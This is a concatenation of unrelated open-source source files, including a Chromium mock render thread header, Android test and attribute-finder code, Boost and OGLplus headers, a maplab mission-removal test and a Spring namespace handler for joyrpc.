RemoveRoute(int32_t routing_id) override; int GenerateRoutingID() override; bool GenerateFrameRoutingID( int32_t& routing_id, blink::LocalFrameToken& frame_token, base::UnguessableToken& devtools_frame_token) override; void AddFilter(IPC::MessageFilter* filter) override; void RemoveFilter(IPC::MessageFilter* filter) override; void AddObserver(RenderThreadObserver* observer) override; void RemoveObserver(RenderThreadObserver* observer) override; void SetResourceRequestSenderDelegate( blink::WebResourceRequestSenderDelegate* delegate) override; void RecordAction(const base::UserMetricsAction& action) override; void RecordComputedAction(const std::string& action) override; void RegisterExtension(std::unique_ptr<v8::Extension> extension) override; int PostTaskToAllWebWorkers(base::RepeatingClosure closure) override; base::WaitableEvent* GetShutdownEvent() override; int32_t GetClientId() override; void SetRendererProcessType( blink::scheduler::WebRendererProcessType type) override; blink::WebString GetUserAgent() override; blink::WebString GetReducedUserAgent() override; const blink::UserAgentMetadata& GetUserAgentMetadata() override; bool IsUseZoomForDSF() override; #if defined(OS_WIN) void PreCacheFont(const LOGFONT& log_font) override; void ReleaseCachedFonts() override; #endif void SetFieldTrialGroup(const std::string& trial_name, const std::string& group_name) override; void SetUseZoomForDSFEnabled(bool zoom_for_dsf); void WriteIntoTrace( perfetto::TracedProto<perfetto::protos::pbzero::RenderProcessHost> proto) override; // Returns a new, unique routing ID that can be assigned to the next view, // widget, or frame. int32_t GetNextRoutingID(); // Dispatches control messages to observers. bool OnControlMessageReceived(const IPC::Message& msg); base::ObserverList<RenderThreadObserver>::Unchecked& observers() { return observers_; } // The View expects to be returned a valid |reply.route_id| different from its // own. We do not keep track of the newly created widget in MockRenderThread, // so it must be cleaned up on its own. void OnCreateWindow(const mojom::CreateNewWindowParams& params, mojom::CreateNewWindowReply* reply); void OnCreateChildFrame( int32_t child_routing_id, mojo::PendingAssociatedRemote<mojom::Frame> frame_remote, mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker> browser_interface_broker); // Returns the receiver end of the BrowserInterfaceBroker interface whose // client end was passed in to construct RenderFrame with |routing_id|; if // any. The client end will be used by the RenderFrame to service interface // requests originating from the initial empty document. mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker> TakeInitialBrowserInterfaceBrokerReceiverForFrame(int32_t routing_id); protected: // This function operates as a regular IPC listener. Subclasses // overriding this should first delegate to this implementation. virtual bool OnMessageReceived(const IPC::Message& msg); IPC::TestSink sink_; scoped_refptr<base::SingleThreadTaskRunner> io_task_runner_; // Routing ID what will be assigned to the next view, widget, or frame. int32_t next_routing_id_; // Pending BrowserInterfaceBrokers sent from the renderer when creating a // new Frame and informing the browser. std::map<int32_t, mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker>> frame_routing_id_to_initial_browser_brokers_; // The last known good deserializer for sync messages. std::unique_ptr<IPC::MessageReplyDeserializer> reply_deserializer_; // A list of message filters added to this thread. std::vector<scoped_refptr<IPC::MessageFilter> > filters_; // Observers to notify. base::ObserverList<RenderThreadObserver>::Unchecked observers_; std::unique_ptr<mojom::RenderMessageFilter> mock_render_message_filter_; bool zoom_for_dsf_ = false; }; } // namespace content #endif // CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_
2,012
460
#include "../../../tools/assistant/lib/fulltextsearch/qquery_p.h"
26
836
<filename>runner/android_junit_runner/java/androidx/test/internal/runner/listener/TraceRunListener.java /* * Copyright (C) 2021 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.test.internal.runner.listener; import android.util.Log; import androidx.tracing.Trace; import org.junit.runner.Description; import org.junit.runner.notification.RunListener; /** A JUnit RunListener that reports {@link android.os.Trace} info for each test case */ public class TraceRunListener extends RunListener { private Thread startedThread = null; @Override public void testStarted(Description description) throws Exception { startedThread = Thread.currentThread(); String testClassName = description.getTestClass() != null ? description.getTestClass().getSimpleName() : "None"; String methodName = description.getMethodName() != null ? description.getMethodName() : "None"; Trace.beginSection(testClassName + "#" + methodName); } @Override public void testFinished(Description description) throws Exception { if (Thread.currentThread().equals(startedThread)) { Trace.endSection(); } else { // Trace expects the begin/end section calls to be on same thread. // Listeners should always be invoked on test/instrumentation thread, // but log an error in case this changes. Log.e("TraceRunListener", "testFinished called on different thread than testStarted"); } startedThread = null; } }
575
575
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_ #define CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_ #include "base/compiler_specific.h" #include "base/macros.h" #include "base/memory/singleton.h" #include "components/keyed_service/content/browser_context_keyed_service_factory.h" class Profile; namespace captive_portal { class CaptivePortalService; } // Singleton that owns all captive_portal::CaptivePortalServices and associates // them with Profiles. Listens for the Profile's destruction notification and // cleans up the associated captive_portal::CaptivePortalService. Incognito // profiles have their own captive_portal::CaptivePortalService. class CaptivePortalServiceFactory : public BrowserContextKeyedServiceFactory { public: // Returns the captive_portal::CaptivePortalService for |profile|. static captive_portal::CaptivePortalService* GetForProfile(Profile* profile); static CaptivePortalServiceFactory* GetInstance(); private: friend class CaptivePortalBrowserTest; friend class CaptivePortalServiceTest; friend struct base::DefaultSingletonTraits<CaptivePortalServiceFactory>; CaptivePortalServiceFactory(); ~CaptivePortalServiceFactory() override; // BrowserContextKeyedServiceFactory: KeyedService* BuildServiceInstanceFor( content::BrowserContext* profile) const override; content::BrowserContext* GetBrowserContextToUse( content::BrowserContext* context) const override; DISALLOW_COPY_AND_ASSIGN(CaptivePortalServiceFactory); }; #endif // CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_
545
4,816
/** * @file include/retdec/config/config_exceptions.h * @brief Definitions of config exceptions. * @copyright (c) 2017 Avast Software, licensed under the MIT license */ #ifndef RETDEC_CONFIG_CONFIG_EXCEPTIONS_H #define RETDEC_CONFIG_CONFIG_EXCEPTIONS_H #include <exception> #include <string> namespace retdec { namespace config { /** * Base class for Config exceptions which can be thrown to the outside world (library users). */ class Exception : public std::exception { }; /** * Config exception which can be thrown to the outside world (library users). * It represents an error during JSON parsing. * It contains an error message and line and column in JSON where error occurred. */ class ParseException : public Exception { public: ParseException( const std::string& message, std::size_t line, std::size_t column) : _message(message), _line(line), _column(column), _whatMessage(_message + " @ line = " + std::to_string(_line) + ", column = " + std::to_string(_column)) { } std::string getMessage() const { return _message; } std::size_t getLine() const { return _line; } std::size_t getColumn() const { return _column; } /** * @return Single throw message constructed from error message * and error line and column in JSON. */ virtual const char* what() const noexcept override { return _whatMessage.c_str(); } private: /// Error message. std::string _message; /// Line in JSON where error occurred. std::size_t _line = 0; /// Column in JSON where error occurred. std::size_t _column = 0; /// Message returned by @c what() method. std::string _whatMessage; }; /** * Config exception which can be thrown to the outside world (library users). * It is thrown when provided input file can not be opened. */ class FileNotFoundException : public Exception { public: FileNotFoundException(const std::string& message) : _whatMessage(message) { } virtual const char* what() const noexcept override { return _whatMessage.c_str(); } private: /// Message returned by @c what() method. std::string _whatMessage; }; } // namespace config } // namespace retdec #endif
762
789
from hailtop.hail_logging import configure_logging # configure logging before importing anything else configure_logging() from .memory import run # noqa: E402 pylint: disable=wrong-import-position run()
61
721
package crazypants.enderio.base.item.darksteel.upgrade.hoe; import java.util.List; import javax.annotation.Nonnull; import com.enderio.core.common.util.NNList; import crazypants.enderio.api.upgrades.IDarkSteelItem; import crazypants.enderio.api.upgrades.IDarkSteelUpgrade; import crazypants.enderio.api.upgrades.IRule; import crazypants.enderio.base.EnderIO; import crazypants.enderio.base.config.config.DarkSteelConfig; import crazypants.enderio.base.handler.darksteel.AbstractUpgrade; import crazypants.enderio.base.handler.darksteel.Rules; import crazypants.enderio.base.item.darksteel.upgrade.energy.EnergyUpgrade; import crazypants.enderio.base.item.darksteel.upgrade.energy.EnergyUpgradeManager; import crazypants.enderio.base.lang.Lang; import net.minecraft.item.ItemStack; import net.minecraftforge.event.RegistryEvent; import net.minecraftforge.fml.common.Mod.EventBusSubscriber; import net.minecraftforge.fml.common.eventhandler.SubscribeEvent; @EventBusSubscriber(modid = EnderIO.MODID) public class HoeUpgrade extends AbstractUpgrade { private static final @Nonnull String UPGRADE_NAME = "hoe"; public static final @Nonnull HoeUpgrade INSTANCE = new HoeUpgrade(); @SubscribeEvent public static void registerDarkSteelUpgrades(@Nonnull RegistryEvent.Register<IDarkSteelUpgrade> event) { event.getRegistry().register(INSTANCE); } public HoeUpgrade() { super(UPGRADE_NAME, "enderio.darksteel.upgrade.hoe", DarkSteelConfig.darkSteelHoeCost); } @Override @Nonnull public List<IRule> getRules() { return new NNList<>(Rules.callbacksFor(this), EnergyUpgrade.HAS_ANY, Rules.itemTypeTooltip(Lang.DSU_CLASS_TOOLS_AXE), Rules.itemTypeTooltip(Lang.DSU_CLASS_TOOLS_CROOK)); } @Override public boolean canOtherBeRemoved(@Nonnull ItemStack stack, @Nonnull IDarkSteelItem item, @Nonnull IDarkSteelUpgrade other) { return !EnergyUpgradeManager.isLowestPowerUpgrade(other); } }
640
364
<filename>implement/oglplus/enums/pixel_data_type_range.ipp // File implement/oglplus/enums/pixel_data_type_range.ipp // // Automatically generated file, DO NOT modify manually. // Edit the source 'source/enums/oglplus/pixel_data_type.txt' // or the 'source/enums/make_enum.py' script instead. // // Copyright 2010-2019 <NAME>. // Distributed under the Boost Software License, Version 1.0. // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt // namespace enums { OGLPLUS_LIB_FUNC aux::CastIterRange< const GLenum*, PixelDataType > ValueRange_(PixelDataType*) #if (!OGLPLUS_LINK_LIBRARY || defined(OGLPLUS_IMPLEMENTING_LIBRARY)) && \ !defined(OGLPLUS_IMPL_EVR_PIXELDATATYPE) #define OGLPLUS_IMPL_EVR_PIXELDATATYPE { static const GLenum _values[] = { #if defined GL_UNSIGNED_BYTE GL_UNSIGNED_BYTE, #endif #if defined GL_BYTE GL_BYTE, #endif #if defined GL_UNSIGNED_SHORT GL_UNSIGNED_SHORT, #endif #if defined GL_SHORT GL_SHORT, #endif #if defined GL_UNSIGNED_INT GL_UNSIGNED_INT, #endif #if defined GL_INT GL_INT, #endif #if defined GL_HALF_FLOAT GL_HALF_FLOAT, #endif #if defined GL_FLOAT GL_FLOAT, #endif #if defined GL_UNSIGNED_BYTE_3_3_2 GL_UNSIGNED_BYTE_3_3_2, #endif #if defined GL_UNSIGNED_BYTE_2_3_3_REV GL_UNSIGNED_BYTE_2_3_3_REV, #endif #if defined GL_UNSIGNED_SHORT_5_6_5 GL_UNSIGNED_SHORT_5_6_5, #endif #if defined GL_UNSIGNED_SHORT_5_6_5_REV GL_UNSIGNED_SHORT_5_6_5_REV, #endif #if defined GL_UNSIGNED_SHORT_4_4_4_4 GL_UNSIGNED_SHORT_4_4_4_4, #endif #if defined GL_UNSIGNED_SHORT_4_4_4_4_REV GL_UNSIGNED_SHORT_4_4_4_4_REV, #endif #if defined GL_UNSIGNED_SHORT_5_5_5_1 GL_UNSIGNED_SHORT_5_5_5_1, #endif #if defined GL_UNSIGNED_SHORT_1_5_5_5_REV GL_UNSIGNED_SHORT_1_5_5_5_REV, #endif #if defined GL_UNSIGNED_INT_8_8_8_8 GL_UNSIGNED_INT_8_8_8_8, #endif #if defined GL_UNSIGNED_INT_8_8_8_8_REV GL_UNSIGNED_INT_8_8_8_8_REV, #endif #if defined GL_UNSIGNED_INT_10_10_10_2 GL_UNSIGNED_INT_10_10_10_2, #endif #if defined GL_UNSIGNED_INT_2_10_10_10_REV GL_UNSIGNED_INT_2_10_10_10_REV, #endif #if defined GL_UNSIGNED_INT_24_8 GL_UNSIGNED_INT_24_8, #endif #if defined GL_UNSIGNED_INT_10F_11F_11F_REV GL_UNSIGNED_INT_10F_11F_11F_REV, #endif #if defined GL_UNSIGNED_INT_5_9_9_9_REV GL_UNSIGNED_INT_5_9_9_9_REV, #endif #if defined GL_FLOAT_32_UNSIGNED_INT_24_8_REV GL_FLOAT_32_UNSIGNED_INT_24_8_REV, #endif 0 }; return aux::CastIterRange< const GLenum*, PixelDataType >(_values, _values+sizeof(_values)/sizeof(_values[0])-1); } #else ; #endif } // namespace enums
1,207
2,960
#include <stdio.h> #include <stdlib.h> int removeElement(int *nums, int numsSize, int val) { int i, count = 0; for (i = 0; i < numsSize; i++) { if (nums[i] != val) { nums[count++] = nums[i]; } } return count; } int main(int argc, char **argv) { int i; int *nums = malloc((argc - 2) * sizeof(int)); for (i = 0; i < argc - 2; i++) { nums[i] = atoi(argv[i + 2]); } int count = removeElement(nums, argc - 2, atoi(argv[1])); for (i = 0; i < count; i++) { printf("%d ", nums[i]); } printf("\n"); return 0; }
314
1,256
#pragma once #include "FarPluginBase.hpp" #include "SystemApi.hpp" #include "strmix.hpp" #include "debug.h" #include "makeguid.h" #include "AnsiGuard.hpp" #include "D5D/d5dformat.h" #include "D5D/d5dlanguage.h" #include "../../API/module.hpp" class D5DModule; class D5DPlugin; class D5DArchive; class D5DLanguage; #include "d5d.Archive.h" #include "d5d.Plugin.h" #include "d5d.Module.h" #include "d5d.Language.h"
195
3,799
<filename>core/core/src/main/java/androidx/core/content/pm/ShortcutInfoCompatSaver.java /* * Copyright 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.core.content.pm; import static androidx.annotation.RestrictTo.Scope.LIBRARY; import static androidx.annotation.RestrictTo.Scope.LIBRARY_GROUP_PREFIX; import androidx.annotation.AnyThread; import androidx.annotation.RestrictTo; import androidx.annotation.WorkerThread; import java.util.ArrayList; import java.util.List; /** * Defines APIs to access and update a persistable list of {@link ShortcutInfoCompat}. This class * is no-op as is and may be overridden to provide the required functionality. * * @hide */ @RestrictTo(LIBRARY_GROUP_PREFIX) public abstract class ShortcutInfoCompatSaver<T> { @AnyThread public abstract T addShortcuts(List<ShortcutInfoCompat> shortcuts); @AnyThread public abstract T removeShortcuts(List<String> shortcutIds); @AnyThread public abstract T removeAllShortcuts(); @WorkerThread public List<ShortcutInfoCompat> getShortcuts() throws Exception { return new ArrayList<>(); } /** * Implementation that does nothing and returns null from asynchronous methods. * * @hide */ @RestrictTo(LIBRARY) public static class NoopImpl extends ShortcutInfoCompatSaver<Void> { @Override public Void addShortcuts(List<ShortcutInfoCompat> shortcuts) { return null; } @Override public Void removeShortcuts(List<String> shortcutIds) { return null; } @Override public Void removeAllShortcuts() { return null; } } }
750
8,865
<filename>atlas-aapt/frameworks/base/libs/androidfw/tests/AttributeFinder_test.cpp /* * Copyright (C) 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <androidfw/AttributeFinder.h> #include <gtest/gtest.h> using android::BackTrackingAttributeFinder; class MockAttributeFinder : public BackTrackingAttributeFinder<MockAttributeFinder, int> { public: MockAttributeFinder(const uint32_t* attrs, int len) : BackTrackingAttributeFinder(0, len) { mAttrs = new uint32_t[len]; memcpy(mAttrs, attrs, sizeof(*attrs) * len); } ~MockAttributeFinder() { delete mAttrs; } inline uint32_t getAttribute(const int index) const { return mAttrs[index]; } private: uint32_t* mAttrs; }; static const uint32_t sortedAttributes[] = { 0x01010000, 0x01010001, 0x01010002, 0x01010004, 0x02010001, 0x02010010, 0x7f010001 }; static const uint32_t packageUnsortedAttributes[] = { 0x02010001, 0x02010010, 0x01010000, 0x01010001, 0x01010002, 0x01010004, 0x7f010001 }; static const uint32_t singlePackageAttributes[] = { 0x7f010007, 0x7f01000a, 0x7f01000d, 0x00000000 }; TEST(AttributeFinderTest, IteratesSequentially) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(3, finder.find(0x01010004)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(5, finder.find(0x02010010)); EXPECT_EQ(6, finder.find(0x7f010001)); EXPECT_EQ(end, finder.find(0x7f010002)); } TEST(AttributeFinderTest, PackagesAreOutOfOrder) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(6, finder.find(0x7f010001)); EXPECT_EQ(end, finder.find(0x7f010002)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(5, finder.find(0x02010010)); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(3, finder.find(0x01010004)); } TEST(AttributeFinderTest, SomeAttributesAreNotFound) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(end, finder.find(0x01010003)); EXPECT_EQ(3, finder.find(0x01010004)); EXPECT_EQ(end, finder.find(0x01010005)); EXPECT_EQ(end, finder.find(0x01010006)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(end, finder.find(0x02010002)); } TEST(AttributeFinderTest, FindAttributesInPackageUnsortedAttributeList) { const int end = sizeof(packageUnsortedAttributes) / sizeof(*packageUnsortedAttributes); MockAttributeFinder finder(packageUnsortedAttributes, end); EXPECT_EQ(2, finder.find(0x01010000)); EXPECT_EQ(3, finder.find(0x01010001)); EXPECT_EQ(4, finder.find(0x01010002)); EXPECT_EQ(end, finder.find(0x01010003)); EXPECT_EQ(5, finder.find(0x01010004)); EXPECT_EQ(end, finder.find(0x01010005)); EXPECT_EQ(end, finder.find(0x01010006)); EXPECT_EQ(0, finder.find(0x02010001)); EXPECT_EQ(end, finder.find(0x02010002)); EXPECT_EQ(1, finder.find(0x02010010)); EXPECT_EQ(6, finder.find(0x7f010001)); } TEST(AttributeFinderTest, FindAttributesInSinglePackageAttributeList) { const int end = sizeof(singlePackageAttributes) / sizeof(*singlePackageAttributes); MockAttributeFinder finder(singlePackageAttributes, end); EXPECT_EQ(end, finder.find(0x010100f4)); EXPECT_EQ(end, finder.find(0x010100f5)); EXPECT_EQ(end, finder.find(0x010100f6)); EXPECT_EQ(end, finder.find(0x010100f7)); EXPECT_EQ(end, finder.find(0x010100f8)); EXPECT_EQ(end, finder.find(0x010100fa)); EXPECT_EQ(0, finder.find(0x7f010007)); }
1,947
17,104
<filename>mars/boost/predef/architecture/x86/64.h /* Copyright <NAME> 2008-2015 Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) */ #ifndef BOOST_PREDEF_ARCHITECTURE_X86_64_H #define BOOST_PREDEF_ARCHITECTURE_X86_64_H #include <boost/predef/version_number.h> #include <boost/predef/make.h> /*` [heading `BOOST_ARCH_X86_64`] [@http://en.wikipedia.org/wiki/Ia64 Intel IA-64] architecture. [table [[__predef_symbol__] [__predef_version__]] [[`__x86_64`] [__predef_detection__]] [[`__x86_64__`] [__predef_detection__]] [[`__amd64__`] [__predef_detection__]] [[`__amd64`] [__predef_detection__]] [[`_M_X64`] [__predef_detection__]] ] */ #define BOOST_ARCH_X86_64 BOOST_VERSION_NUMBER_NOT_AVAILABLE #if defined(__x86_64) || defined(__x86_64__) || \ defined(__amd64__) || defined(__amd64) || \ defined(_M_X64) # undef BOOST_ARCH_X86_64 # define BOOST_ARCH_X86_64 BOOST_VERSION_NUMBER_AVAILABLE #endif #if BOOST_ARCH_X86_64 # define BOOST_ARCH_X86_64_AVAILABLE #endif #define BOOST_ARCH_X86_64_NAME "Intel x86-64" #include <boost/predef/architecture/x86.h> #endif #include <boost/predef/detail/test.h> BOOST_PREDEF_DECLARE_TEST(BOOST_ARCH_X86_64,BOOST_ARCH_X86_64_NAME)
664
1,936
<filename>algorithms/map-optimization-legacy/test/test_remove_mission_test.cc #include <gtest/gtest.h> #include <maplab-common/test/testing-entrypoint.h> #include <maplab-common/test/testing-predicates.h> #include <vi-map/check-map-consistency.h> #include "map-optimization-legacy/test/6dof-vi-map-gen.h" namespace map_optimization_legacy { class RemoveMissionTest : public testing::Test { public: RemoveMissionTest() : generator_(), map_(generator_.vi_map_) { // Create a map with 2 missions. generator_.generateVIMap(); first_mission_id_ = map_.getIdOfFirstMission(); map_.duplicateMission(first_mission_id_); } void addCrossMissionObservations() { vi_map::MissionId other_mission_id; vi_map::MissionId first_mission_id = map_.getIdOfFirstMission(); const vi_map::VIMission& first_mission = map_.getMission(first_mission_id); pose_graph::VertexId first_vertex_id = first_mission.getRootVertexId(); // Get other mission ID. vi_map::MissionIdList mission_ids; map_.getAllMissionIds(&mission_ids); for (const vi_map::MissionId& mission_id : mission_ids) { if (mission_id != first_mission_id) { other_mission_id = mission_id; break; } } CHECK(other_mission_id.isValid()); const vi_map::VIMission& other_mission = map_.getMission(other_mission_id); pose_graph::VertexId other_vertex_id = other_mission.getRootVertexId(); // Merge a couple of landmarks. const unsigned int merge_every_nth_landmark = 5; unsigned int landmark_count = 0; do { vi_map::Vertex& first_vertex = map_.getVertex(first_vertex_id); vi_map::Vertex& other_vertex = map_.getVertex(other_vertex_id); vi_map::LandmarkIdList first_vertex_list, other_vertex_list; first_vertex.getStoredLandmarkIdList(&first_vertex_list); other_vertex.getStoredLandmarkIdList(&other_vertex_list); ASSERT_EQ(first_vertex_list.size(), other_vertex_list.size()); for (size_t i = 0; i < first_vertex_list.size(); ++i) { if (landmark_count % merge_every_nth_landmark == 0) { map_.mergeLandmarks(first_vertex_list[i], other_vertex_list[i]); } ++landmark_count; } // Also swap observed landmark IDs of some landmarks so we have landmark // observations shared across missions too. vi_map::LandmarkIdList first_vertex_observed_landmark_list; vi_map::LandmarkIdList other_vertex_observed_landmark_list; first_vertex.getFrameObservedLandmarkIds( 0, &first_vertex_observed_landmark_list); other_vertex.getFrameObservedLandmarkIds( 0, &other_vertex_observed_landmark_list); const unsigned int swap_every_nth_landmark = 9; landmark_count = 0; for (size_t i = 0; i < first_vertex_observed_landmark_list.size(); ++i) { if (landmark_count % swap_every_nth_landmark == 0) { other_vertex.setObservedLandmarkId(0, i, vi_map::LandmarkId()); map_.getLandmark(other_vertex_observed_landmark_list[i]) .removeAllObservationsOfVertexAndFrame(other_vertex_id, 0); map_.associateKeypointWithExistingLandmark( other_vertex_id, 0, i, first_vertex_observed_landmark_list[i]); } ++landmark_count; } } while (map_.getNextVertex( first_vertex_id, pose_graph::Edge::EdgeType::kViwls, &first_vertex_id) && map_.getNextVertex( other_vertex_id, pose_graph::Edge::EdgeType::kViwls, &other_vertex_id)); } void addNonChronologicalLandmarkMerges() { vi_map::MissionIdList mission_ids; map_.getAllMissionIds(&mission_ids); for (const vi_map::MissionId& mission_id : mission_ids) { pose_graph::VertexIdList mission_vertex_ids; map_.getAllVertexIdsInMission(mission_id, &mission_vertex_ids); CHECK_GT(mission_vertex_ids.size(), 3u); const pose_graph::VertexId& first_vertex_id = mission_vertex_ids[0]; const pose_graph::VertexId& second_vertex_id = mission_vertex_ids[2]; CHECK_GT(map_.getVertex(first_vertex_id).getLandmarks().size(), 0u); CHECK_GT(map_.getVertex(second_vertex_id).getLandmarks().size(), 0u); const vi_map::LandmarkId first_vertex_landmark = map_.getVertex(first_vertex_id).getLandmarks().begin()->id(); const vi_map::LandmarkId second_vertex_landmark = map_.getVertex(second_vertex_id).getLandmarks().begin()->id(); map_.mergeLandmarks(first_vertex_landmark, second_vertex_landmark); } } protected: SixDofVIMapGenerator generator_; vi_map::VIMap& map_; vi_map::MissionId first_mission_id_; }; TEST_F(RemoveMissionTest, MapConsistencyTest) { addCrossMissionObservations(); ASSERT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 2u); map_.removeMission(first_mission_id_, true); EXPECT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 1u); } TEST_F(RemoveMissionTest, MapConsistencyTestWithMergedLandmarkObservations) { addCrossMissionObservations(); addNonChronologicalLandmarkMerges(); ASSERT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 2u); map_.removeMission(first_mission_id_, true); EXPECT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 1u); } } // namespace map_optimization_legacy MAPLAB_UNITTEST_ENTRYPOINT
2,243
5,169
{ "name": "zzhengkit", "version": "1.0.0", "summary": "zzkit是自定义的控件.", "description": "zzkit 是一个用于测试podspec的工具", "homepage": "https://github.com/Zzzzzzhen/zzkit", "license": "MIT", "authors": { "zhaozheng": "<EMAIL>" }, "platforms": { "ios": "8.0" }, "source": { "git": "https://github.com/Zzzzzzhen/zzkit.git", "tag": "1.0.0" }, "source_files": "ZZKit/ZZKit/ZZView/**/*.{h,m}" }
224
766
"""Provides an internal interface for working with image features.""" __all__ = ["image"]
23
398
<gh_stars>100-1000 package io.joyrpc.spring.schema; /*- * #%L * joyrpc * %% * Copyright (C) 2019 joyrpc.io * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import io.joyrpc.spring.processor.DependsOnDefinitionPostProcessor; import org.springframework.beans.factory.config.BeanDefinition; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.RootBeanDefinition; import org.springframework.beans.factory.xml.NamespaceHandlerSupport; import org.springframework.beans.factory.xml.ParserContext; import org.w3c.dom.Element; import java.util.concurrent.atomic.AtomicBoolean; /** * 将xml的标签绑定到解析器 */ public class SpringNamespaceHandler extends NamespaceHandlerSupport { protected AtomicBoolean ready = new AtomicBoolean(); @Override public void init() { registerBeanDefinitionParser("provider", new ProviderBeanDefinitionParser()); registerBeanDefinitionParser("consumer", new ConsumerBeanDefinitionParser()); registerBeanDefinitionParser("consumerGroup", new ConsumerGroupBeanDefinitionParser()); registerBeanDefinitionParser("server", new ServerBeanDefinitionParser()); registerBeanDefinitionParser("registry", new RegistryBeanDefinitionParser()); registerBeanDefinitionParser("parameter", new GlobalParameterDefinitionParser()); } @Override public BeanDefinition parse(Element element, ParserContext parserContext) { if (ready.compareAndSet(false, true)) { BeanDefinitionRegistry registry = parserContext.getRegistry(); if (!registry.containsBeanDefinition(DependsOnDefinitionPostProcessor.BEAN_NAME)) { registry.registerBeanDefinition(DependsOnDefinitionPostProcessor.BEAN_NAME, new RootBeanDefinition(DependsOnDefinitionPostProcessor.class)); } } return super.parse(element, parserContext); } }
800
2,099
<reponame>yuyedaidao/SGPlayer<filename>SGPlayer/Classes/Core/SGMetal/SGMetalModel.h // // SGMetalModel.h // MetalTest // // Created by Single on 2019/6/24. // Copyright © 2019 Single. All rights reserved. // #import <Metal/Metal.h> @interface SGMetalModel : NSObject - (instancetype)initWithDevice:(id<MTLDevice>)device; @property (nonatomic) NSUInteger indexCount; @property (nonatomic) MTLIndexType indexType; @property (nonatomic) MTLPrimitiveType primitiveType; @property (nonatomic, strong) id<MTLDevice> device; @property (nonatomic, strong) id<MTLBuffer> indexBuffer; @property (nonatomic, strong) id<MTLBuffer> vertexBuffer; @end
221
34,359
/*++ Copyright (c) Microsoft Corporation Module Name: - EventSynthesis.hpp Abstract: - Defined functions for converting strings/characters into events (for interactivity) Separated from types/convert. Author: - <NAME> (duhowett) 10-Feb-2021 --*/ #pragma once #include <deque> #include <memory> #include "../../types/inc/IInputEvent.hpp" namespace Microsoft::Console::Interactivity { std::deque<std::unique_ptr<KeyEvent>> CharToKeyEvents(const wchar_t wch, const unsigned int codepage); std::deque<std::unique_ptr<KeyEvent>> SynthesizeKeyboardEvents(const wchar_t wch, const short keyState); std::deque<std::unique_ptr<KeyEvent>> SynthesizeNumpadEvents(const wchar_t wch, const unsigned int codepage); }
318
892
